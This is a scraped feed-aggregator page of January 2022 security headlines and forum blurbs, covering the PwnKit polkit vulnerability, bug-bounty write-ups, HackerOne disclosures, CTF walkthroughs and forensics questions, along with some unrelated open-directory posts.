    Article URL: https://github.com/nccgroup/nmap-nse-vulnerability-scripts Comments URL: https://news.ycombinator.com/item?id=30122224 Points: 2 # Comments: 0  ( 1 min )
  • Open

    GitHub: The Red-Teamer’s Cheat-Sheet
    It’s no secret that GitHub has become one of the main information resources for red-team reconnaissance. I mean, why bother with complex… Continue reading on Medium »  ( 3 min )
    How To Handle Security Due Diligence During The M&A Process
    More often than not, we see our clients show interest in other companies. This pull can come in many different forms, but it’s usually… Continue reading on Medium »  ( 2 min )
  • Open

    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made $15,000+ By Hacking Caching Servers — Part 1
    @bxmbn Continue reading on Medium »  ( 1 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    A Summary of OAuth 2.0 Attack Methods
    The attacker grabs the authentication request to construct a malicious URL and deceives the logged-in user of the server to click it. Continue reading on Medium »  ( 2 min )
    TrustRecruit — BUG BOUNTY
    TrustRecruit will be allocating 750,000 TRT of the total supply of $TRT tokens to successful bounty hunters. Continue reading on Medium »  ( 2 min )
    2fa Bypass by changing Request method to DELETE
    Hello Everyone My name is Arth Bajpai, I’m from Lucknow, India, and I’m back with my third write-up about a 2fa Bypass which I Found a… Continue reading on Medium »  ( 3 min )
    My First Bug is P1 in Just 3 Minute
    Hello Hacker’s and Security Guys that is My first article on how to find a P1 bug Continue reading on Medium »  ( 1 min )
  • Open

    CVE-2022-0329 and the problems with automated vulnerability management
    Article URL: https://tomforb.es/cve-2022-0329-and-the-problems-with-automated-vulnerability-management/ Comments URL: https://news.ycombinator.com/item?id=30128872 Points: 9 # Comments: 4  ( 2 min )
  • Open

    Some lingerie photos NSFW (among other more boring stuff)
    submitted by /u/Boobalizer [link] [comments]
    PS3 sound files from games - Nicely sorted (Good speed. ~11 MB/s.)
    submitted by /u/Boobalizer [link] [comments]  ( 1 min )
  • Open

    Misconfiguration in build environment allows DLL preloading attack
    Monero disclosed a bug submitted by nim4: https://hackerone.com/reports/896338
    XSS via X-Forwarded-Host header
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1392935 - Bounty: $200
  • Open

    how did my Hosting service changed my interface config?
    Hello AskNetsec, I got a VPS on a hosting service with ubuntu on it and I closed all the ports changed the default ssh port and changed the root and default user passwords, then I asked my hosting service o change my public IP address, After that I saw my /etc/network/interfaces config changed...how did they do that? even there is nothing in the history :\ any info on how they did it is apricated. ​ thanks! submitted by /u/g0g0gaga [link] [comments]  ( 1 min )
    How are you guys using IOCs in your SIEM environment?
    Hey everyone! I was curious how everyone is using IOCs in their SIEM environments. We are currently focusing on TTP’s but would love to have the ability to compare our logs against known positive IOCs. We are currently only using them in our EDR solution but not our SIEM. How are you guys using them in the SIEM platform? submitted by /u/RedNeckHutch [link] [comments]  ( 2 min )
    Just finished my first week of training in SOC. Anyone here familiar with MAStermind? Looking for resources to study over the weekend.
    SOC training has been so cool. The access I have is nuts. submitted by /u/ShittyF00dPorn [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Five Hacking Tips - Pkexec Linux Priv. Escalation
    submitted by /u/sysrisk [link] [comments]
  • Open

    FreeBuf早报 | 芬兰外交官设备感染飞马间谍软件;美国以国安为由吊销中国通讯公司牌照
    据外媒报道,美国联邦通信委员会(FCC)以“严重的国家安全担忧”为由,吊销了中国联通美洲公司的牌照。  ( 1 min )
    Packer ?对抗 ?“透明部落”正在寻求CrimsonRAT的新出路
    Transparent Tribe组织的主要目标是针对印度政府、军队或相关组织,以及巴基斯坦的激进分子和民间社会。  ( 1 min )
    社会责任 | 斗象科技2021年的“FUN心”之道
    使命担当,践行责任
    编写基于RestTemplate的—在线武器库
    通过Springboot RestTemplate玩转自动化工具开发,达到团队协作的真正功能。  ( 2 min )
    工业网络靶场漫谈(八)|国外工业网络靶场概况
    本文将将把视角移向国外,简要梳理介绍国外工业网络靶场的发展状况。  ( 1 min )

  • Open

    North Korea's Lazarus APT leverages Windows Update client, GitHub in latest campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Detecting and mitigating CVE-2021-4034: “Pwnkit” local privilege escalation
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    How to Analyze RTF Template Injection Attacks
    submitted by /u/ogunal00 [link] [comments]
    Pivoting with SSH Tunnels and Plink
    submitted by /u/m_edmondson [link] [comments]
    Rip Raw - A tool to analyse the memory of compromised Linux systems.
    submitted by /u/0x636f6f6c [link] [comments]
    Stop Storing Secrets In Environment Variables!
    submitted by /u/alxjsn [link] [comments]  ( 3 min )
    ROP Chaining: Return Oriented Programming (study notes, tutorial)
    submitted by /u/Kondencuotaspienas [link] [comments]
    "Stratus Red Team": open-source adversary emulation for AWS
    submitted by /u/thorn42 [link] [comments]
    The Cookies Parasite - Bypassing MFA with cookie theft
    submitted by /u/amirshk [link] [comments]
  • Open

    CTF Walkthrough | TryHackMe | Freshly
    Can you root this Wordpress style, SQL injection vulnerable machine? This CTF is about SQL Injection and Wordpress hacking. Developers… Continue reading on Medium »  ( 4 min )
  • Open

    Fixing the Linux Kernel Vulnerability Cve-2022-0185
    Article URL: https://blog.accuknox.com/how-to-protect-from-cve-2022-0185-using-accuknox-opensource-tools/ Comments URL: https://news.ycombinator.com/item?id=30120314 Points: 1 # Comments: 0  ( 6 min )
    RHSB-2022-001 Polkit Privilege Escalation – (CVE-2021-4034)
    Article URL: https://access.redhat.com/security/vulnerabilities/RHSB-2022-001 Comments URL: https://news.ycombinator.com/item?id=30113422 Points: 1 # Comments: 0  ( 10 min )
  • Open

    Fixing the Linux Kernel Vulnerability Cve-2022-0185
    Article URL: https://blog.accuknox.com/how-to-protect-from-cve-2022-0185-using-accuknox-opensource-tools/ Comments URL: https://news.ycombinator.com/item?id=30120314 Points: 1 # Comments: 0  ( 6 min )
  • Open

    A bunch of movie scripts
    submitted by /u/theg721 [link] [comments]  ( 1 min )
    words
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    horse food
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Russian and European rocket launch videos - Broadcast quality
    http://tvdownload.esa.int/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Magnetometer datasets from various space missions
    https://pds-ppi.igpp.ucla.edu/data/ he Planetary Plasma Interactions (PPI) Node of the Planetary Data System (PDS) archives and distributes digital data related to the study of the interaction between the solar wind and planetary winds with planetary magnetospheres, ionospheres and surfaces. The PPI Node is located at the Department of Earth, Planetary, and Space Sciences at the University of California, Los Angeles (UCLA). submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-28 Review
    CodeQL 提升篇 by ourren 如何入门工控漏洞挖掘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    DC系列靶机知识点总结
    本篇文章,主要针对DC系列9个靶机中用到的工具,命令和提权的知识点进行总结。  ( 1 min )
    vulnhub之DC-9靶机渗透详细过程
    非常详细的DC-9打靶过程。  ( 1 min )
    vulnhub之DC-8靶机渗透详细过程
    非常详细的DC-8打靶过程。  ( 1 min )
    vulnhub之DC-7靶机渗透详细过程
    非常详细的DC-7打靶过程笔记。  ( 1 min )
    FreeBuf早报 | 欧盟向WhatsApp下通牒;朝鲜关键服务疑遭DDoS攻击
    欧盟委员会宣布, WhatsApp 必须在一个月内澄清其服务条款和隐私政策最近发生的一些变化,以确保符合欧盟的消费者保护法。  ( 1 min )
    国家网信办发布《互联网信息服务深度合成管理规定(征求意见稿)》
    《意见稿》共计二十五条,明确了对生成合成类算法和利用深度学习、虚拟现实等新技术新应用制作音视频内容等的监管要求,进一步厘清、细化深度合成技术的应用场景,明确深度合成服务提供者和使用者的信息安全义务。
    2022年10款好用免费数据恢复软件分享
    2022年10款好用免费数据恢复软件分享  ( 1 min )
    CVE-2021-4034 Linux Polkit 权限提升漏洞挖掘思路解读
    一文带你了解CVE-2021-4034漏洞的挖掘全过程。  ( 1 min )
  • Open

    Paytm-Broken Link Hijacking
    Hello Everyone…. Continue reading on InfoSec Write-ups »  ( 2 min )
    TEJAS PANCHAL ONE OF THE YOUNGEST CYBER SECURITY EXPERT.
    We welcome increasingly more potent online vulnerabilities as we go into a digitized future with advanced information technology shaping… Continue reading on Medium »  ( 1 min )
    OpenLeverage Partners with Code4rena for Audit Contest to Enhance Security Measures
    Since our inception, OpenLeverage has been committed to developing a permissionless lending and margin trading protocol with aggregated… Continue reading on Medium »  ( 2 min )
  • Open

    Are there any dynamic lists that are maintained to track VPNs egress points like nord or surfshark?
    submitted by /u/krattalak [link] [comments]  ( 1 min )
  • Open

    Targeted Healers: Open Source Analysis of Attacks on Hospitals and Medical Staff in Sudan
    Open source evidence shows how Sudan’s security forces attacked hospitals, medical workers and patients during recent protests in Khartoum Continue reading on Medium »  ( 7 min )
    Try Hack Me’s OhSint:A Walkthrough
    ​Hello readers, welcome to this segment of my blog, as I guide you to solve the OhSint Room, hosted on TryHackMe.This room is a lot of fun! Continue reading on Medium »  ( 2 min )
  • Open

    Anyone done the FLETC forensics courses?
    I'm doing forensics for the military and have an upcoming Digital Evidence Collection in an Enterprise Environment course at FLETC. Since a lot of members of this subreddit are LE, I was wondering if any of you have taken this course and, if so, how was it? submitted by /u/Sandyblanders [link] [comments]  ( 1 min )
  • Open

    Zero trust countdown: New OMB memo stresses urgency for modern AppSec
    A new OMB memo from the White House is underscoring the need for federal agencies to adopt zero trust architecture in AppSec. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    Full read SSRF via Lark Docs `import as docs` feature
    Lark Technologies disclosed a bug submitted by sirleeroyjenkins: https://hackerone.com/reports/1409727 - Bounty: $5000

  • Open

    Certification Question
    I am enrolled in a boot camp for Certified Computer Forensics Examiner/ Certified Mobile Forensics Examiner through InfoSec Institute next week. This was to prepare us for IACRB's certifications CCFE/CMFE. This morning, I noticed that InfoSec pulled the original syllabus, IACRB's website is locked down and have since learned that IACRB is now dissolved. InfoSec says that the certification will be now issued by them instead of IACRB (apparently, IACRB was affiliated with them originally). I know certifications aren't the end-all, be-all (experience is key, I know). But I want to make sure that I am receiving certs from organizations that are trustworthy. I've seen many job postings asking for the CCFE especially. Does this matter at all? Did IACRB's standing show any clout previously and will this now be lost? submitted by /u/FormerFive0 [link] [comments]  ( 2 min )
    Help with a ransomware infected Synology NAS
    Hi all, I recently encountered a Synology NAS with proprietary Synology RAID on both of its 4TB Hdds. I initially intended to acquire both drives and attempt to rebuild the RAID with all possible bit and strip size combinations but realised that it might not be worth it. My objective was to reacquire a readable drive and process the data in AXIOM for timeline, event logs analysis etc. My last resort would be to run the NAS on a simulated network to access the files. But I realise that even then I may not be able to target a network drive to acquire the data. Perhaps only log file analysis by exporting Linux artefacts (bash history, recent files, system logs etc) Would like to seek advise from those who had previously encountered such exhibits and how you managed to retrieve log records. Would running KAPE on a host network pc targeting the network drive or perhaps using a Tsurugi OS machine and linking it to the NAS to run analysis tools be useful here? submitted by /u/Drako880 [link] [comments]  ( 2 min )
    Did Encase support linux/docker forensic
    Which Encase enpack can we get memory of Linux physical machine and docker memory? Which are the Linux forensic artifacts support by Encase besides user login/bash history/process/network info, any Enpack can use? Did Encase provide timeline analysis for linux image/Docker image? submitted by /u/cyberfo [link] [comments]  ( 1 min )
  • Open

    Anyone have a good list of people to follow on twitter for security updates? Preferably ones that have a lot of technical content.
    I know twitter is very good for security news, but a lot of the ones I find are just like news sites that don't tell me much about the technical side of new vulnerabilities, attacks and bugs. I'm interested in pretty much all topics of security. Appsec, mobile sec, threat modelling, anything. If you have lists of people to follow who go into great technical detail, I'd be very grateful! Thanks! submitted by /u/Epsi0 [link] [comments]  ( 1 min )
    what is the best way to cleanse a PC?
    I'm no tech buff so sorry if I'm asking all the wrong questions. but when I was living with family my siblings would test out their spyware hacks on my laptop/phone's I remember on the laptop I could tell when they were trying something because it would start acting funny and on startup or mid session there would be a couple cmd boxes that would appear run something and close out by themselves. recently I'm seeing the same type of things happening mainly on my GF's laptop but we are renting our own apartment so I am a little worried about security. I'm using Avira anti-virus but honestly think these things are a joke. my question is how exactly do you protect against and get rid of attacks like this? I have tried reformatting the drives in the past but that would only last long enough for whatever i deleted to redownload then ill be having the same symptoms all over again. sorry for the broad description like i said I'm not that tech savvy but thanks for you guys time and hopefully can point me in the right direction. much appreciated! submitted by /u/Questionable_Qs_2655 [link] [comments]  ( 2 min )
    How does clicking a email link result in installing malware?
    Can someone explain exactly how clicking on a link on a email can install malware on device? submitted by /u/LagunaLoireFF8 [link] [comments]  ( 1 min )
    How do you manage auxiliary AD accounts password expiration ?
    For example, separated admin accounts in an Active Directory without interactive logons (run-as) : you don't get interactive notifications about password expiration for that account... ho do you manage this ? script ? submitted by /u/arnaudluti [link] [comments]  ( 2 min )
    Why should sensitive documents not be sent via Email?
    Why do people advise against sending sensitive documents via Email? submitted by /u/Linux98 [link] [comments]  ( 2 min )
  • Open

    CVE-2021-4034
    Article URL: https://ariadne.space/2022/01/27/cve-2021-4034/ Comments URL: https://news.ycombinator.com/item?id=30105994 Points: 2 # Comments: 0  ( 4 min )
  • Open

    StellarParticle Campaign: Novel Tactics and Techniques | CrowdStrike
    submitted by /u/dmchell [link] [comments]
    Prime Minister’s Office Compromised: Details of Recent Espionage Campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Technical Analysis of CVE-2022-22583: Bypassing macOS System Integrity Protection (SIP)
    submitted by /u/shleimeleh [link] [comments]
    OSS PwnKit Detector (CVE-2021-4034)
    submitted by /u/SRMish3 [link] [comments]  ( 1 min )
    PwnKit: How to detect privilege escalation using CrowdSec
    submitted by /u/klausagnoletti [link] [comments]
    [New] Configuring Linux AuditD for Threat Detection
    submitted by /u/InH4te [link] [comments]
    How to use FaPro to simulate multiple devices in network
    submitted by /u/ntestoc3 [link] [comments]
  • Open

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
  • Open

    Sleep Attack: Intel Bootguard vulnerability waking from S3 (2021)
    Article URL: https://trmm.net/Sleep_attack/ Comments URL: https://news.ycombinator.com/item?id=30103498 Points: 1 # Comments: 0  ( 10 min )
    Xerox vulnerability to remotely brick network printers
    Article URL: https://neosmart.net/blog/2022/xerox-vulnerability-allows-unauthenticated-network-users-to-remotely-brick-printers/ Comments URL: https://news.ycombinator.com/item?id=30097563 Points: 2 # Comments: 0  ( 8 min )
    Polkit vulnerability was discovered in 2013
    Article URL: https://twitter.com/ryiron/status/1486207182404472832 Comments URL: https://news.ycombinator.com/item?id=30094998 Points: 2 # Comments: 0  ( 1 min )
  • Open

    vulnhub之DC-6靶机渗透详细过程
    非常详细的DC-6靶机渗透过程,仅供大家一起学习、交流。  ( 1 min )
    FreeBuf早报 | Tor项目起诉一俄罗斯法院;英国拟向儿童科普DDoS攻击后果
    英国国家犯罪局(NCA)的网络犯罪部门正在着手进行一项旨在教育儿童了解 DDoS 攻击后果的计划。  ( 1 min )
    美国《提升国家安全、国防和情报系统网络安全备忘录》全文翻译及解读
    本文从发布背景、六大亮点与业界反响三个方面解读美国总统拜登签署的《提升国家安全、国防和情报系统网络安全备忘录》(NSM)。  ( 1 min )
    渗透测试之高效信息搜集(整合)
    几乎每一个学习渗透的安全人员,都会被告知,信息收集是渗透测试的本质,那事实果真如此嘛?  ( 2 min )
    美国政府正式发布零信任战略,拟在2024财年前实现特定目标
    在整个政府范围内启动零信任框架迁移,大幅降低针对联邦政府数字基础设施的网络攻击风险。
    python_mmdt:ssdeep、tlsh、vhash、mmdthash对比(六)
    本文通过400个测试文件的关联性分析对比,对比ssdeep、tlsh、vhash、mmdthash之间的效果差异。  ( 3 min )
    实现CobaltStrike上线短信提醒【没用的技巧又增加了】
    叮,您有新的主机上线,请查收哦!  ( 1 min )
    中央网信办等10部门发布《数字乡村发展行动计划(2022-2025年)》
    《行动计划》围绕发展目标,从8个方面部署了26项重点任务。
    【情报工具】分享24个国内外政府开放数据平台
    开放数据(Open Data),尤其是政府的开放数据(Government Open Data),是一类重要的但仍未被妥善开发利用的庞大资源。  ( 1 min )
    Linux Polkit Root权限提升漏洞(CVE-2021-4034)
    polkit 是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。  ( 1 min )
    《Gartner 2022年网络防火墙关键能力报告》发布,Fortinet获得三大用例最高得分
    世界经济论坛预估,2022年全球网络犯罪支出将达到惊人的2.2万亿美元。  ( 1 min )
  • Open

    SecWiki News 2022-01-27 Review
    2021年物联网设备CVE天梯榜 by ourren Flare-On 8th两道题目复现 by ourren 应急响应-Yara规则木马检测 by ourren ISOON2021 线下域渗透题解 by ourren 去中心化上线CS by ourren 漏洞监控平台——Monitor by ourren 聊聊API安全的重要性及治理思路 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on InfoSec Write-ups »  ( 4 min )
    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on Medium »  ( 4 min )
    How I was able to get HOF in one of the world’s leading hotel brands by 30 mins of googling.
    Hey Folks! Yash Dharmani (H1GH4T) here, Hope you’re all doing good. Continue reading on Medium »  ( 2 min )
    Tìm những bug trên Symfony
    Cre:How I was able to find multiple vulnerabilities of a Symfony Web Framework web application | by Abid Ahmad | Jan, 2022 | Medium Continue reading on Medium »  ( 1 min )
    Kindle You’re My Little Cuddle Bug Full
    You’re My Little Cuddle Bug Read Online    Download Link => You’re My Little Cuddle Bug     Deskripsi Book  Celebrate your little cuddle… Continue reading on Medium »  ( 2 min )
    웁살라시큐리티, Nakji Network와 총 20만 달러 버그 바운티 진행
    Uppsala Security(웁살라시큐리티)는 블록체인 온체인 데이터 인덱싱 프로젝트인 Nakji Network(Nakji Network)와 버그 바운티 프로그램을 함께 합니다. Continue reading on Medium »  ( 2 min )
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    Improper access control for users with expired password, giving the user full access through API and Git
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1285226 - Bounty: $950
    subdomain takeover on fddkim.zomato.com
    Zomato disclosed a bug submitted by mosec9: https://hackerone.com/reports/1130376 - Bounty: $350
  • Open

    This subreddit in the WayBack Machine.
    https://web.archive.org/web/*/https://www.reddit.com/r/opendirectories/ https://web.archive.org/web/*/https://old.reddit.com/r/opendirectories/ ​ submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
  • Open

    CyberSoc | Cyber Detective CTF Write Up — Evidence Investigation
    OSINT-focused CTF Challenges. OSINT in Goverment, Stego, Crypto multiple languages, WIFI, EXIF and more Continue reading on Medium »  ( 4 min )

  • Open

    Pwnkit: How to exploit and check
    submitted by /u/DevSec23 [link] [comments]
    Reversing ALPHV (aka BlackCat): Rust-Based Ransomware
    submitted by /u/rsobers [link] [comments]
    Bypassing Little Snitch Firewall with Empty TCP Packets
    submitted by /u/hackers_and_builders [link] [comments]
    Perfect wordlist to discover directories and files on target size with tools like ffuf.
    submitted by /u/mexhanical [link] [comments]  ( 1 min )
    wholeaked: a file-sharing tool that allows you to find the responsible person in case of a leakage
    submitted by /u/utku1337 [link] [comments]  ( 2 min )
    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/apanonimo [link] [comments]
    Self-contained exploit for CVE-2021-4034 (Pkexec 1-day LPE)
    submitted by /u/ly4k_ [link] [comments]
    Exploit for CVE-2021-4034 that does not leave syslog entries
    submitted by /u/hermajordoctor [link] [comments]
    Webcam Hacking (again) - Safari UXSS
    submitted by /u/Straight_Finding_756 [link] [comments]
  • Open

    [Question] Using Shodan or another 'search engine' to find MS SQL servers
    Is it possible to use Shodan or another engine to find public facing SQL servers, more specifically, if you know of a database name, could it be found? I realize MS SQL has some default ports, and I can search for those, but I'm curious to know if its possible to search for a database name, too. TIA. submitted by /u/Drivingmecrazeh [link] [comments]  ( 1 min )
    Password cracking options..
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? What's the price of it? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    What does a booter/stresser site need to do in order to be legal?
    Ive seen tons of these booter projects and am aware that under certain circumstances the websites themselves are completely legal. what separates Redwolf, from other DDoS sites you find all around in terms of legality. I understand that Redwolf is used legally and the other ones usually arent but what makes the website itself from being legal or illegal? submitted by /u/raultheuniverse [link] [comments]  ( 1 min )
    Accidentally DIRBed the wrong site
    I was playing around with dirb and was going to run it on a private test site but had a typo and accidentally ran it on an actual website and didn't realize for a few minutes that I had messed it up. Should I reach out to site administrator or be concerned or is it ok? EDIT: Lmfao at the comments keep them coming submitted by /u/Mesachi_06 [link] [comments]  ( 2 min )
    Sitting through Offsec 2-3 day exams
    I'm wondering what people with full time jobs and kids are doing about the Offsec courses with 2-3 day exams. Are you just biting the bullet and taking the exam or just taking the training and not taking the exam? After OSCP I've been just taking the Offsec trainings and going over material, but without a goal like taking an exam and getting the certification there's very little motivation to study the material. I usually go over the pdf to pick up some new tricks and move on. After full day of work and family I don't even know when to find 2-3 days straight to do the exam. I still don't understand why Offsec doesn't change the exams to 5 days and let people do it like it's done in a real world instead of putting unnecessary pressure with ctf style exam time frame. Also when I took OSCP exam I didn't have to deal with being monitored. I get up from computer chair every 20 minutes and I can see getting annoyed about having to deal with this for 2-3 days pretty fast. submitted by /u/ravenoverflow [link] [comments]  ( 5 min )
  • Open

    A brief overview of JWT and its exploits
    Introduction Continue reading on System Weakness »
    A brief overview of JWT and its exploits
    Introduction Continue reading on Medium »
    Beginner Bug Bounty Guide - Part 4
    Previous : Beginner Bug Bounty Guide - Part 3 Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide - Part 3
    Previous : Beginner Bug Bounty Guide - Part 2 Continue reading on Medium »
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    Note: sanitization of these screenshots was performed to protect the identities of stakeholders involved. Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - DIRECTORY TRAVERSAL LAB ÇÖZÜMLERİ
    Directory Traversal (Dizin-Dosya Geçişi), saldırganların bir web sunucusundaki kısıtlı dizinlere erişmesine ve web sunucusunun kök dizini… Continue reading on Medium »  ( 3 min )
  • Open

    Redis – Vulnerability Disclosure Program
    Article URL: https://hackerone.com/redis-vdp Comments URL: https://news.ycombinator.com/item?id=30091276 Points: 2 # Comments: 0
    Local privilege escalation vulnerability in polkit’s pkexec
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30086222 Points: 2 # Comments: 0  ( 8 min )
    PwnKit: Local Privilege Escalation Vulnerability Discovered in Polkit’s Pkexec
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30086204 Points: 1 # Comments: 0  ( 7 min )
    Android security tool APKLeaks patches critical vulnerability
    Article URL: https://portswigger.net/daily-swig/android-security-tool-apkleaks-patches-critical-vulnerability Comments URL: https://news.ycombinator.com/item?id=30085811 Points: 1 # Comments: 0  ( 3 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    Password cracking tools
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    Timeline from MFTECmd VS plaso & log2timeline
    I was taught these 2 methods of creating timelines from MFT. I am familiar with using the timeline output from MFTECmd. Is there a reason I should be using timeline from plaso & log2timeline? Are there benefits or details there I could miss from using MFTECmd? Because it seems slightly more tedious to generate timeline using plaso & log2timeline. Comments from those who use both? submitted by /u/bangfire [link] [comments]  ( 1 min )
    Encase Endpoint
    Any users of this product? How useful do you think it is? Have any real competitors popped up? (I've heard Symantec mentioned) I've heard some former customers say it was 10x+ cheaper than running multiple physical extractions with a large consultant submitted by /u/Nick_Investor [link] [comments]  ( 1 min )
  • Open

    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    chvancooten/NimPackt-v1: Nim-based assembly packer and shellcode loader for opsec & profit
    submitted by /u/dmchell [link] [comments]
    Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA
    submitted by /u/SCI_Rusher [link] [comments]
    Hacktivist group shares details related to Belarusian Railways hack
    submitted by /u/dmchell [link] [comments]
  • Open

    10 GiB of Classic music in FLAC or APE format
    https://funambule.org/classique/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    How can I stop getting my WiFi flagged??
    My network provider (or rather Warner Bros.) has flagged a download that I attempted for Dune (the 2021 movie). I wanna know how I can stop having my WiFi's address flagged for DMCA claims. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    AU/NZ/CA - TV & movie archive
    submitted by /u/vsharer [link] [comments]
    rotary telephones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Sooooo..... What happened to the Homeland Security post?
    be me see post click and see files nope the fuck out of there.... submitted by /u/ringofyre [link] [comments]  ( 1 min )
  • Open

    【安全通报】Linux Polkit本地权限提升漏洞(CVE-2021-4034...
    近日,网络上出现 Linux 下 Polkit 工具集的本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权...
  • Open

    CVE-2022-0185: Container+Kubernetes manifest as crash POC
    Article URL: https://github.com/discordianfish/cve-2022-0185-crash-poc/blob/main/crash.c Comments URL: https://news.ycombinator.com/item?id=30087809 Points: 1 # Comments: 0  ( 1 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    HOW HACKERS ARE CHANGING LIVES
